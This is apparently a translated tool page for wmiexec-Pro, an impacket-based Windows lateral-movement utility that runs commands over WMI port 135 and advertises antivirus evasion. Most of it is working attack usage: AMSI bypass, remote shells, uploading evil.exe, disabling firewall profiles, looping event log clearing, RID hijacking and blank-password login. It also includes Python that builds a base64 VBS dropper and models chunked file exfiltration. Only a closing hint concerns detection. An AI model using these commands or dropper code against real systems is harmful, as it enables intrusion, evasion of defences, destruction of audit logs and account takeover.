Introduction
A new generation of wmiexec.py with more features. The whole workflow runs over port 135 alone (no SMB connection is needed) and is intended for bypassing AV (Windows Defender, Huorong, 360) during lateral movement.
Tool features
- Main function: Bypass AV
- Main feature: no Win32_Process needed
- Main characteristic: only port 135 needed
- New module: AMSI bypass
- New module: file transfer
- New module: remotely enable RDP via WMI class methods
- New module: Windows Firewall abuse
- New module: looping event log clearing
- New module: remotely enable WinRM without touching cmd
- New module: service manager
- New module: RID hijacking
- Enhancement: obtain command execution output in a new way
- Enhancement: execute VBS files
Tool usage
python3 wmiexec-pro.py [[domain/]username[:password]@]<targetName or address> module -h

Basic enumeration:
python3 wmiexec-pro.py administrator:password@192.168.1.1 enum -run

Enable/disable AMSI bypass:
python3 wmiexec-pro.py administrator:password@192.168.1.1 amsi -enable
python3 wmiexec-pro.py administrator:password@192.168.1.1 amsi -disable

Execute command:
python3 wmiexec-pro.py administrator:password@192.168.1.1 exec-command -shell (Launch a semi-interactive shell)
python3 wmiexec-pro.py administrator:password@192.168.1.1 exec-command -command "whoami" (Default is output mode)
python3 wmiexec-pro.py administrator:password@192.168.1.1 exec-command -command "whoami" -silent (Silent mode)
python3 wmiexec-pro.py administrator:password@192.168.1.1 exec-command -command "whoami" -silent -old (Silent mode on old OS versions, such as Server 2003)
python3 wmiexec-pro.py administrator:password@192.168.1.1 exec-command -command "whoami" -old (With output on old OS versions, such as Server 2003)
python3 wmiexec-pro.py administrator:password@192.168.1.1 exec-command -command "whoami" -save (With output, and save the output to a file)
python3 wmiexec-pro.py administrator:password@192.168.1.1 exec-command -command "whoami" -old -save
python3 wmiexec-pro.py administrator:password@192.168.1.1 exec-command -clear (Remove the temporary class used for command result storage)

File transfer:
python3 wmiexec-pro.py administrator:password@192.168.1.1 filetransfer -upload -src-file "./evil.exe" -dest-file "C:\windows\temp\evil.exe" (Upload files over 512KB)
python3 wmiexec-pro.py administrator:password@192.168.1.1 filetransfer -download -src-file "C:\windows\temp\evil.exe" -dest-file "/tmp/evil.exe" (Download files over 512KB)
python3 wmiexec-pro.py administrator:password@192.168.1.1 filetransfer -clear (Remove the temporary class used for file transfer)

RDP:
python3 wmiexec-pro.py administrator:password@192.168.1.1 rdp -enable (Auto-configures the firewall)
python3 wmiexec-pro.py administrator:password@192.168.1.1 rdp -enable -old (For old OS versions, such as Server 2003)
python3 wmiexec-pro.py administrator:password@192.168.1.1 rdp -enable-ram (Enable Restricted Admin Mode for PTH; not supported on old OS versions, such as Server 2003)
python3 wmiexec-pro.py administrator:password@192.168.1.1 rdp -disable
python3 wmiexec-pro.py administrator:password@192.168.1.1 rdp -disable -old (For old OS versions, such as Server 2003)
python3 wmiexec-pro.py administrator:password@192.168.1.1 rdp -disable-ram (Disable Restricted Admin Mode)

WinRM (Only supports Win7+):
python3 wmiexec-pro.py administrator:password@192.168.1.1 winrm -enable
python3 wmiexec-pro.py administrator:password@192.168.1.1 winrm -disable

Firewall (Only supports Win8+):
python3 wmiexec-pro.py administrator:password@192.168.1.1 firewall -search-port 445
python3 wmiexec-pro.py administrator:password@192.168.1.1 firewall -dump (Dump all firewall rules)
python3 wmiexec-pro.py administrator:password@192.168.1.1 firewall -rule-id (ID from search-port) -action [enable/disable/remove] (Enable, disable or remove the specified rule)
python3 wmiexec-pro.py administrator:password@192.168.1.1 firewall -firewall-profile enable (Enable all firewall profiles)
python3 wmiexec-pro.py administrator:password@192.168.1.1 firewall -firewall-profile disable (Disable all firewall profiles)

Services:
python3 wmiexec-pro.py administrator:password@192.168.1.1 service -action create -service-name "test" -display-name "For test" -bin-path 'C:\windows\system32\calc.exe'
python3 wmiexec-pro.py administrator:password@192.168.1.1 service -action create -service-name "test" -display-name "For test" -bin-path 'C:\windows\system32\calc.exe' -class "Win32_TerminalService" (Create the service via an alternative class)
python3 wmiexec-pro.py administrator:password@192.168.1.1 service -action start -service-name "test"
python3 wmiexec-pro.py administrator:password@192.168.1.1 service -action stop -service-name "test"
python3 wmiexec-pro.py administrator:password@192.168.1.1 service -action disable -service-name "test"
python3 wmiexec-pro.py administrator:password@192.168.1.1 service -action auto-start -service-name "test"
python3 wmiexec-pro.py administrator:password@192.168.1.1 service -action manual-start -service-name "test"
python3 wmiexec-pro.py administrator:password@192.168.1.1 service -action getinfo -service-name "test"
python3 wmiexec-pro.py administrator:password@192.168.1.1 service -action delete -service-name "test"
python3 wmiexec-pro.py administrator:password@192.168.1.1 service -dump all-services.json

Eventlog:
python3 wmiexec-pro.py administrator:password@192.168.1.1 eventlog -risk-i-know (Looping event log clearing)
python3 wmiexec-pro.py administrator:password@192.168.1.1 eventlog -retrive object-ID (Stop looping event log clearing)

RID hijack:
python3 wmiexec-pro.py administrator:password@192.168.1.1 rid-hijack -user 501 -action grant (Grant access permissions on the SAM/SAM subkey in the registry)
python3 wmiexec-pro.py administrator:password@192.168.1.1 rid-hijack -user 501 -action grant-old (For old OS versions, such as Server 2003)
python3 wmiexec-pro.py administrator:password@192.168.1.1 rid-hijack -user 501 -action activate (Activate the user)
python3 wmiexec-pro.py administrator:password@192.168.1.1 rid-hijack -user 501 -action deactivate (Deactivate the user)
python3 wmiexec-pro.py administrator:password@192.168.1.1 rid-hijack -user 501 -action hijack -hijack-rid 500 (Hijack the guest user RID 501 to the administrator RID 500)
python3 wmiexec-pro.py administrator:password@192.168.1.1 rid-hijack -blank-pass-login enable (Enable blank password login)
python3 wmiexec-pro.py administrator:password@192.168.1.1 rid-hijack -blank-pass-login disable
python3 wmiexec-pro.py administrator:password@192.168.1.1 rid-hijack -user 500 -action backup (Saves the user profile data as a JSON file)
python3 wmiexec-pro.py guest@192.168.1.1 -no-pass rid-hijack -user 500 -remove (Use the guest user to remove the administrator user profile after the RID has been hijacked)
python3 wmiexec-pro.py guest@192.168.1.1 -no-pass rid-hijack -restore "backup.json" (Restore the user profile for the target user)
Command execution (screenshot omitted)
File upload (screenshot omitted)
File download (screenshot omitted)
How it works
- AMSI module: the technique from Tal Liberman's Black Hat Asia 2018 talk
- exec-command module: an enhancement of the earlier project wmiexec-RegOut; the command output is fetched from a WMI class instead of from the registry
- filetransfer module:
  - File upload: the source file is base64-encoded into a dropper named WriteFile.vbs, then a new ActiveScriptEventConsumer object instance is created to execute the dropper
  - File download: a class for holding the data is created remotely, then the encoder LocalFileIntoClass.vbs is executed to encode the file and store the data in the newly created class
- rdp module:
  - Enable/disable the RDP service: directly controls the TerminalServices object
  - Enable/disable Restricted Admin Mode: controls the DisableRestrictedAdmin registry value via the StdRegProv class
- winrm module:
  - Enable/disable: calls the service module
  - Firewall rules: uses the firewall.py module to configure the firewall for WinRM
- firewall module:
  - Abuses the MSFT_NetProtocolPortFilter, MSFT_NetFirewallRule and MSFT_NetFirewallProfile classes
- service module:
  - Abuses the Win32_Service class
  - Abuse
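The two file-transfer paths above can be modelled offline. The following is an added example, not code from wmiexec-Pro: it builds the kind of VBS dropper the upload path relies on (file embedded as base64, decoded with an MSXML2.DOMDocument bin.base64 node and written with ADODB.Stream), and models the download path by splitting a file into base64 chunks stored as properties of a storage class, then reassembling them. The real tool executes the dropper through an ActiveScriptEventConsumer and stores the download chunks in a real WMI class; neither is reproduced here. The chunk size and the property names Count/Data<N> are assumptions, and a plain dict stands in for the class instance so the logic runs without a target.

```python
import base64
import re
from typing import Dict

# Added example, not part of the wmiexec-Pro project. Chunk length and the
# Count/Data<N> property names are assumptions; a dict stands in for the WMI
# storage class so the encode/decode logic can be exercised offline.

CHUNK_LEN = 4096     # assumed: base64 characters stored per class property
LITERAL_LEN = 100    # length of each VBS string literal in the dropper


def build_dropper_vbs(data: bytes, dest_path: str) -> str:
    """Upload side: return a VBScript dropper that embeds `data` as base64.

    The script decodes the base64 through an MSXML2.DOMDocument node of
    dataType bin.base64 and writes the bytes with ADODB.Stream
    (Type 1 = binary, SaveToFile mode 2 = create/overwrite).
    """
    b64 = base64.b64encode(data).decode("ascii")
    parts = [b64[i:i + LITERAL_LEN] for i in range(0, len(b64), LITERAL_LEN)] or [""]
    literal = " & _\n    ".join('"%s"' % p for p in parts)   # VBS line continuation
    path = dest_path.replace('"', '""')                       # VBS doubles embedded quotes
    return (
        "Dim b64, xml, node, stm\n"
        "b64 = " + literal + "\n"
        'Set xml = CreateObject("MSXML2.DOMDocument")\n'
        'Set node = xml.createElement("b64")\n'
        'node.dataType = "bin.base64"\n'
        "node.text = b64\n"
        'Set stm = CreateObject("ADODB.Stream")\n'
        "stm.Type = 1\n"
        "stm.Open\n"
        "stm.Write node.nodeTypedValue\n"
        'stm.SaveToFile "' + path + '", 2\n'
        "stm.Close\n"
    )


def extract_dropper_payload(vbs: str) -> bytes:
    """Recover the embedded file from a dropper, i.e. what the target writes."""
    m = re.search(r"^b64 = (.*?)\nSet xml", vbs, re.S | re.M)
    if m is None:
        raise ValueError("not a dropper produced by build_dropper_vbs")
    return base64.b64decode("".join(re.findall(r'"([A-Za-z0-9+/=]*)"', m.group(1))))


def encode_into_class(data: bytes, chunk_len: int = CHUNK_LEN) -> Dict[str, str]:
    """Download side, target: split the file into base64 chunks laid out like
    the string properties of a storage class (stand-in for LocalFileIntoClass.vbs)."""
    b64 = base64.b64encode(data).decode("ascii")
    chunks = [b64[i:i + chunk_len] for i in range(0, len(b64), chunk_len)]
    props = {"Count": str(len(chunks))}
    for idx, chunk in enumerate(chunks):
        props["Data%d" % idx] = chunk
    return props


def decode_from_class(props: Dict[str, str]) -> bytes:
    """Download side, operator: read Data0..Data<Count-1> back and reassemble."""
    count = int(props["Count"])
    return base64.b64decode("".join(props["Data%d" % i] for i in range(count)))


if __name__ == "__main__":
    sample = bytes(range(256)) * 3                      # constructed sample payload
    vbs = build_dropper_vbs(sample, r"C:\windows\temp\evil.exe")
    assert extract_dropper_payload(vbs) == sample
    cls = encode_into_class(sample, chunk_len=64)
    assert decode_from_class(cls) == sample
    print(vbs.splitlines()[1][:60] + " ...")
    print("round-trip ok; storage class holds %s chunks" % cls["Count"])
```

Because the upload path never opens SMB, the only artefacts on the target are the dropper text inside the event consumer and the written file, which is why the page stresses that everything stays on port 135; the base64 blob in ScriptText is also what a defender would look for in WMI-Activity or Sysmon event-consumer logging.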
Disclaimer
The spirit of this open-source initiative is to help security researchers and the community accelerate research related to network protocols and stack implementations. The information in this code base is for research and educational purposes and is not intended for production environments and/or as part of commercial products.
If you wish to use this code or parts of it for your own purposes, we recommend that you apply an appropriate secure development lifecycle and secure coding practices, and that you generate and track the corresponding indicators of compromise according to your needs.
Any direct or indirect consequences and losses caused by distributing or using the functionality provided by this tool are the sole responsibility of the user; the author assumes no responsibility for them.
Download
https://github.com/XiaoliChan/wmiexec-Pro
Originally published on the WeChat official account 七芒星实验室: "impacket-based AV-evading lateral movement remote command execution tool"